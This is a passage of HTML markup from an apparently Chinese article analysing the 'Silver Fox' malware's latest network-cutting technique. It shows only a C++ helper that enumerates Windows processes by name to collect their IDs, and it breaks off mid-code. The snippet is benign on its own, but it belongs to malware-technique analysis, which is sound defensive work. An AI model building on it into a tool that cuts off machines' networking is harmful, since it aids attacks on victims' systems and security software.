11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> std</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">::</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">wstring</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&amp;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> processName</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">{</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">std</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">::</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">vector</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&lt;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">DWORD</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&gt;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> pids</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">HANDLE snapshot </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> CreateToolhelp32Snapshot</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">TH32CS_SNAPPROCESS, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;DecValTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">);</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ControlFlowTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">if</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">snapshot </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">==</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> INVALID_HANDLE_VALUE</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">{</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span><span leaf="">wprintf</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;StringTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">L&#34;[!] CreateToolhelp32Snapshot failed.</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;SpecialCharTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">\n</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;StringTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&#34;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">);</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ControlFlowTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">return</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> pids</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">}</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">PROCESSENTRY32W pe</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">pe</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">.</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">dwSize </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;KeywordTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">sizeof</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">pe</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">);</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ControlFlowTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">if</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(!</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">Process32FirstW</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">snapshot, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&amp;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">pe</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">))</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">{</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span><span leaf="">CloseHandle</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">snapshot</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">);</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span><span leaf="">wprintf</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;StringTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">L&#34;[!] Process32FirstW failed.</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;SpecialCharTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">\n</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;StringTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&#34;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">);</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ControlFlowTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">return</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> pids</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: 